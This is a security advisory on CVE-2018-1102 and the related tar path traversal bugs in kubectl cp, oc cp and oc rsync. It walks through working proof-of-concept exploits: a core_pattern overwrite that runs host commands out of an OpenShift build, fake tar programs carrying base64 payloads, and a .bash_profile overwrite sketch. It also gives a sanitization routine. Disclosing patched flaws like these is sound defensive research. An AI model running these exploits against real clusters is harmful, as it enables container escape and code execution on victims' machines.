Author: Michael Hanselmann. Updated: May 4, 2018.

OpenShift source-to-image (S2I/STI) builds allow an unprivileged user to build Docker images on an OpenShift cluster. Unlike normal Docker builds, they don't require privileged access to a Docker socket and daemon. All user-controlled code runs with reduced privileges.

In OpenShift Container Platform 3.0 up to and including 3.9, the S2I builder contained a vulnerability allowing an attacker to gain root access on the host system, i.e. outside any Docker container. It was assigned CVE-2018-1102. Red Hat fixed the vulnerability in OpenShift errata releases published on April 27, 2018.

OpenShift Online 3.x and OpenShift Dedicated 3.x were also affected and have been patched by Red Hat.

The underlying cause is comparable to an issue in Kubernetes' kubectl cp command which I found and reported in March 2018 (Kubernetes issue 61297, Red Hat bug 1564305, CVE-2018-1002100). The same code is used by OpenShift's oc cp command, and OpenShift's oc rsync command was vulnerable as well.

Gaining root on the host through a source-to-image build

The source-to-image builder supports incremental builds. It does so by looking for a script named save-artifacts in the last image built by a build configuration. The archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader passed filenames from tar headers as input to filepath.Join without further sanitization. The same code is used by oc rsync, making it equally exploitable.
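
To illustrate the class of bug outside of OpenShift, here's a small, self-contained Python sketch (Python rather than the builder's Go, purely for illustration) showing where a naive join of an attacker-controlled member name ends up when unpacking into the builder's artifact directory:

    #!/usr/bin/python3
    # Standalone sketch of the vulnerable pattern: joining a tar member name
    # onto the destination without sanitization lets "../" sequences climb out
    # of the unpack directory. The archive is built in memory for illustration.
    import io
    import os
    import tarfile

    buf = io.BytesIO()
    with tarfile.TarFile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name="../../../../../proc/sys/kernel/core_pattern")
        payload = b"|/bin/true"
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))

    buf.seek(0)
    dest = "/tmp/artifacts"
    with tarfile.TarFile.open(fileobj=buf) as tar:
        for member in tar.getmembers():
            # Equivalent to filepath.Join(dest, header.Name) in tar.go:
            print(os.path.normpath(os.path.join(dest, member.name)))
            # Prints /proc/sys/kernel/core_pattern - far outside /tmp/artifacts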

Engineering a build to emit a malicious tar archive from save-artifacts was almost trivial. The main challenge was that the S2I builder makes exactly one call to the execve(2) system call, to invoke bsdtar, and that happens well before the artifacts are unpacked, so inserting or replacing executables wouldn't achieve anything. No dynamic library is loaded afterwards either.

The proof-of-concept exploit therefore relies on the fact that the builder container can overwrite the kernel's core_pattern, described in more detail in core(5). Once that's done, the build triggers a core dump and the kernel executes the command previously written to core_pattern in the context of the host system. Here we only start an Nginx container, but it'd be trivial to start a custom image in a privileged container with the host filesystem mounted.
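
The core_pattern mechanism itself can be demonstrated without OpenShift. The sketch below, meant for a throwaway virtual machine and run as root, writes a pipe command to core_pattern and then triggers a core dump; the touch invocation is merely a placeholder for an arbitrary command:

    #!/usr/bin/python3
    # Run as root on a disposable test machine. A core_pattern starting with
    # "|" makes the kernel execute the named program whenever a process dumps
    # core; the program runs on the host, outside any container.
    import os
    import resource

    with open("/proc/sys/kernel/core_pattern", "w") as f:
        f.write("|/usr/bin/touch /var/tmp/core-pattern-demo")

    # Permit a core dump for this process, then abort to trigger one.
    resource.setrlimit(resource.RLIMIT_CORE,
                       (resource.RLIM_INFINITY, resource.RLIM_INFINITY))
    os.abort()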

The original report was reproduced against OpenShift Container Platform v3.6.173.0.96 and v3.7.23.

Reproduction

  1. Create a new project (depending on the cluster environment this may be done differently, e.g. through a control panel):
    master$ oc new-project --skip-config-write poc
    
  2. Assuming the client now has access to the newly created project, we'll create the necessary objects:
    client$ oc -n poc create -f - <<'EOF'
    apiVersion: v1
    kind: List
    items:
    
    - apiVersion: v1
      kind: ImageStream
      metadata:
        name: poc
      spec:
        lookupPolicy:
          local: false
    
    - apiVersion: v1
      kind: BuildConfig
      metadata:
        name: poc
      spec:
        failedBuildsHistoryLimit: 3
        successfulBuildsHistoryLimit: 3
        nodeSelector: {}
        runPolicy: Serial
        source:
          type: Binary
          binary:
            asFile: ""
        strategy:
          type: Source
          sourceStrategy:
            from:
              kind: ImageStreamTag
              namespace: openshift
              name: php:7.0
            incremental: true
            env:
              - name: BUILD_LOGLEVEL
                value: "7"
        output:
          to:
            kind: ImageStreamTag
            name: poc:latest
    EOF
    
  3. For easier observation it's recommended to pin the builds to a specific host, though this isn't strictly necessary:
    client$ oc -n poc patch bc/poc --type=strategic --patch='{ "spec": {
      "nodeSelector": { "kubernetes.io/hostname": "node.example.com" }}}'
    
  4. Assuming the build was pinned to a host, log onto that host and verify that nothing runs on port 8080:
    node$ curl --show-error --silent http://localhost:8080 | head -n2
    curl: (7) Failed connect to localhost:8080; Connection refused
    
  5. We'll need a Python script to generate the build input:
    client$ cat >poc.py <<'EOF'
    #!/usr/bin/python3
    #
    # Copyright (C) 2018, Michael Hanselmann <https://hansmi.ch/>
    
    import os
    import shutil
    import sys
    import tarfile
    import tempfile
    import base64
    
    
    # This command runs in the context of the host system, thus we need to use
    # a command already available (unless we know the path of a file we can
    # control). Docker containers can be made privileged and can mount the host
    # filesystem.
    CORE_PATTERN = "|/bin/docker run -d --name demo -p 8080:80 nginx"
    
    # "core_pattern" may be at most 128 characters long, see core(5)
    assert len(CORE_PATTERN) <= 128
    
    
    with tempfile.NamedTemporaryFile() as tmpbinarytar, \
         tarfile.TarFile.open(tmpbinarytar.name, "w") as binarytar, \
         tempfile.NamedTemporaryFile() as tmpinnertar, \
         tarfile.TarFile.open(tmpinnertar.name, "w") as innertar:
    
      # Marker file to detect when a build used "save-artifacts"
      with tempfile.NamedTemporaryFile() as empty:
        empty.write(b"marker")
        empty.flush()
        innertar.add(empty.name, arcname="artifactmarker")
    
      # Just for fun: redirect write to /proc via symlink; writing directly to
      # "../../../../../proc/sys/..." would also work
      link = tarfile.TarInfo()
      link.name = "proc"
      link.type = tarfile.SYMTYPE
      link.linkname = "../../../../../../../../proc"
      innertar.addfile(link)
    
      with tempfile.NamedTemporaryFile() as corepattern:
        corepattern.write(CORE_PATTERN.encode("ascii"))
        corepattern.flush()
        innertar.add(corepattern.name, arcname="proc/sys/kernel/core_pattern")
    
      innertar.close()
    
      with tempfile.NamedTemporaryFile() as script:
        script.write("""#!/bin/bash
    base64 -d <<'EOF'
    """.encode("ascii"))
        script.write(base64.b64encode(open(tmpinnertar.name, 'rb').read()))
        script.write(b"""
    EOF
    """)
        script.flush()
        os.chmod(script.name, 0o755)
        binarytar.add(script.name, arcname=".s2i/bin/save-artifacts")
    
      with tempfile.NamedTemporaryFile() as script:
        script.write("""#!/bin/bash
    
    find /tmp -type f | sort
    echo
    cat /proc/sys/kernel/core_pattern
    echo
    
    if test -e /tmp/artifacts/artifactmarker && [ "$(< /proc/sys/kernel/core_pattern)" == '{0}' ]; then
      # Trigger core pattern
      bash -c 'ulimit -c unlimited; kill -ABRT $$'; echo $?
    
      sleep 2
    fi
    
    exit 0
    """.format(CORE_PATTERN).encode("ascii"))
        script.flush()
        os.chmod(script.name, 0o755)
        binarytar.add(script.name, arcname=".s2i/bin/assemble")
    
      binarytar.close()
    
      tmpbinarytar.seek(0)
    
      shutil.copyfileobj(tmpbinarytar, sys.stdout.buffer)
    EOF
    
  6. Now we start the first build to put the malicious save-artifacts script in position. The result of this build is pushed to the cluster-internal registry.
    client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
    
  7. Once finished we go for the kill. This second build will retrieve the artifacts from the first build and, by unpacking them, overwrite the kernel's core_pattern. The assemble script will detect that the settings are in place and will trigger a core dump.
    client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
    
  8. Give the system a few seconds (or more if the image needs to be fetched) and then check on the node again:
    node$ curl --show-error --silent http://localhost:8080 | head -n2
    <!DOCTYPE html>
    <html>
    
    This Nginx server, running in a container, was started by a source-to-image build, which isn't supposed to have this kind of access.

Exploiting path traversal in kubectl cp

The kubectl cp command uses the tar program installed within a container to create an archive. It then proceeds to unpack the archive on the client. If the container is controlled by a malicious party who can get a victim to copy any file out of it, e.g. for debugging, they can overwrite any file that is writable by the victim and whose path can be predicted.

This behaviour can be confirmed in kubectl v1.9.5 as well as Red Hat's OpenShift Origin 3.7.2, a downstream consumer of Kubernetes code. It's a result of the code in kubernetes/pkg/kubectl/cmd/cp.go:untarAll using unsanitized filenames from the tar headers as input to filepath.Join. It's been fixed in Kubernetes 1.9.6 and 1.10 (Kubernetes issue 61297).
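
The general mitigation is to validate every member name before joining it onto the destination, and to treat link entries with suspicion. The following Python sketch illustrates the idea; it is deliberately conservative (it rejects link members outright) and is not the actual fix that went into Kubernetes or source-to-image:

    #!/usr/bin/python3
    # Illustrative sanitization only, not the upstream fix: refuse link members
    # and any name that would resolve outside the destination directory.
    import os
    import tarfile

    def safe_extract(archive_path, dest):
        dest = os.path.abspath(dest)
        with tarfile.open(archive_path) as tar:
            for member in tar.getmembers():
                if member.issym() or member.islnk():
                    raise ValueError("refusing link member: " + member.name)
                target = os.path.abspath(os.path.join(dest, member.name))
                if os.path.commonpath([dest, target]) != dest:
                    raise ValueError("path traversal attempt: " + member.name)
            tar.extractall(dest)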

The client code doesn't set the file mode, hence the PoC uses a plain text file. If the attacker knows the path of an executable writable by the victim (or the victim runs the client as root), executables can be replaced and code execution on the client is gained. There are also ways to gain code execution from non-executable files, for example via shell startup files (see the sketch below).
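
For illustration, the tar stream emitted by the fake tar program used below could just as well contain a member targeting a shell startup file; the home directory path and traversal depth in this sketch are purely hypothetical and would have to be known or guessed by the attacker:

    #!/usr/bin/python3
    # Hypothetical variant of the PoC archive: the extracted file lands in a
    # dotfile that the victim's shell sources on the next login. Overwriting it
    # wholesale is crude, but enough to show the path to code execution.
    import io
    import tarfile

    payload = b'echo "this line would run in the victim\'s next login shell"\n'
    with tarfile.TarFile.open("evil.tar", "w") as tar:
        info = tarfile.TarInfo(name="../../../../../home/victim/.bash_profile")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))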

While not demonstrated, it's to be expected that a modified, malicious Kubernetes API server could inject arbitrary files into the stream of any exec request underlying a file copy, and wouldn't even need a prepared and explicitly requested container.

Reproduction

  1. Set up a Kubernetes 1.9.5 cluster within a virtual machine using the instructions in the upstream documentation.
  2. For the sake of simplicity we'll use a busybox container and patch it manually, but obviously the malicious tar program could be part of the image (including a widely used base image) and be more advanced than the one used for this demonstration.
    $ kubectl create -f - <<'EOF'
    apiVersion: extensions/v1beta1
    kind: Deployment
    metadata:
      name: poc
      namespace: default
    spec:
      replicas: 1
      selector:
        matchLabels:
          app: poc
      template:
        metadata:
          creationTimestamp: null
          labels:
            app: poc
        spec:
          containers:
          - command:
            - /bin/sh
            - -c
            - while sleep 1000; do :; done
            image: docker.io/library/busybox:latest
            imagePullPolicy: Always
            name: busybox
            volumeMounts:
            - mountPath: /usr/local/sbin
              name: store
          dnsPolicy: ClusterFirst
          restartPolicy: Always
          schedulerName: default-scheduler
          securityContext: {}
          terminationGracePeriodSeconds: 30
          volumes:
          - emptyDir: {}
            name: store
    EOF
    
  3. Generate a script to simulate a tar program; a Python program is used to generate the shell script. Write the result into the container and make it executable, as shown in the example following the generator.
    #!/usr/bin/python3
    
    import tarfile
    import tempfile
    import os
    import base64
    
    with tempfile.NamedTemporaryFile() as tmpfile, \
         tarfile.TarFile.gzopen(tmpfile.name, "w") as tar:
      with tempfile.NamedTemporaryFile() as text:
        text.write(b"Hello World\n")
        text.flush()
    
        tar.add(text.name,
          arcname="../../../../../../../var/tmp/unexpected")
    
      tar.close()
    
      print("#!/bin/sh")
      print("base64 -d <<EOF | gunzip -c")
      print(base64.b64encode(open(tmpfile.name, 'rb').read()).
        decode("ascii"))
      print("EOF")
    
    Example:
    $ kubectl exec -it poc-... /bin/sh
    
    # Run within container
    $ cat >/usr/local/sbin/tar <<'EOTAR' && chmod +x /usr/local/sbin/tar
    #!/bin/sh
    base64 -d <<EOF | gunzip -c
    H4sICHzQqVoC/3RtcGF5dmlhajdhAO3PQQrCMBCF4Vl7ipwgmTRNewVv4LrY7KopMRWPb3F
    pQReCUPg/HrzFzOZZ6+wm96G4epndck2POZ1rGuUXuupUX63bVvWt+NDEJkT1fSvqu9BHMS
    p/sNzqUIyRknP99Pft/j5uJ45pmrI55TKNBwEAAAAAAAAAAAAAAAAA7MYTXHs6TAAoAAA=
    EOF
    EOTAR
    
  4. Verify that the PoC-generated file doesn't exist on the client system.
    $ stat /var/tmp/unexpected
    stat: cannot stat '/var/tmp/unexpected': No such file or directory
    
  5. Now comes the part which would have to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory.
    $ kubectl cp poc-...:/etc/hosts /tmp/container-hosts
    
  6. A file has been written in /var/tmp on the client system:
    $ cat /var/tmp/unexpected
    Hello World
    

Exploiting path traversal in oc cp and oc rsync

The oc rsync command, just like kubectl cp, uses the tar program installed within a container to create an archive. See the section on exploiting kubectl cp for more details. oc cp uses the same underlying code as kubectl cp.

oc rsync uses the same archive unpacking code as the source-to-image builder. The focus was on producing an exploit for the latter, but for demonstration purposes a proof-of-concept exploit was made nonetheless. It's a result of the archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader using unsanitized filenames from tar headers as input to filepath.Join.

The original report listed a specific reproduction environment, though far more versions were vulnerable.

Reproduction for oc rsync

This demonstration uses oc rsync. oc cp can be exploited by combining the pod setup here with the instructions from the kubectl cp section; a matching command is shown after the reproduction steps.

  1. Create a new project (depending on the cluster environment this may be done differently, e.g. through a control panel):
    $ oc new-project --skip-config-write poc
    
  2. Assuming the client now has access to the newly created project, we'll create the necessary objects. The container comes pre-configured with a malicious tar program, generated using the same Python script as for kubectl cp.
    $ oc -n poc create -f - <<'EOF'
    apiVersion: v1
    kind: List
    items:
    
    - apiVersion: v1
      kind: ConfigMap
      metadata:
        name: override
      data:
        tar: |
          #!/bin/sh
          base64 -d <<EOF | gunzip -c
          H4sICP8WvloC/3RtcGhwZ3d6dmV4AO3PQQrCMBCF4Vl7ipwgmZjYXMEbuC42u2pKTMXjW1xa0IUg
          FP6PB28xs3nWOrvKva+uXSY3X/NjyueWB/mFLjrVV+u6VX0UH/aHFH0IKYn6LmoSo/IH86311Rip
          pbRPf9/u7+M24pjHsZhTqeOwEwAAAAAAAAAAAAAAAADAZjwBJlLCbQAoAAA=
          EOF
    
    - apiVersion: v1
      kind: DeploymentConfig
      metadata:
        name: rsyncpoc
      spec:
        replicas: 1
        selector:
          deployment-config.name: rsyncpoc
        strategy:
          type: Rolling
        template:
          metadata:
            labels:
              deployment-config.name: rsyncpoc
          spec:
            containers:
            - image: busybox
              imagePullPolicy: Always
              command:
                - /bin/sh
                - -c
                - while sleep 1000; do :; done
              name: default-container
              resources: {}
              terminationMessagePath: /dev/termination-log
              terminationMessagePolicy: File
              volumeMounts:
                - name: override
                  readOnly: true
                  mountPath: /usr/local/sbin
            dnsPolicy: ClusterFirst
            restartPolicy: Always
            schedulerName: default-scheduler
            securityContext: {}
            terminationGracePeriodSeconds: 30
            volumes:
            - name: override
              configMap:
                defaultMode: 420
                name: override
                items:
                  - key: tar
                    path: tar
                    mode: 0555
        test: false
        triggers:
          - type: ConfigChange
    EOF
    
  3. Verify that the PoC-generated file doesn't exist on the client system.
    $ stat /var/tmp/unexpected
    stat: cannot stat '/var/tmp/unexpected': No such file or directory
    
  4. This part would have to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory. Get the actual pod name first using oc -n poc get pod.
    $ oc -n poc rsync rsyncpoc-...:/foo /tmp/
    
  5. A file has been written in /var/tmp on the client system:
    $ cat /var/tmp/unexpected
    Hello World
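
For oc cp the same pod can be reused. Combined with the steps from the kubectl cp section, the victim's side would boil down to a command along these lines (actual pod name elided, as above):
    $ oc -n poc cp rsyncpoc-...:/etc/hosts /tmp/container-hosts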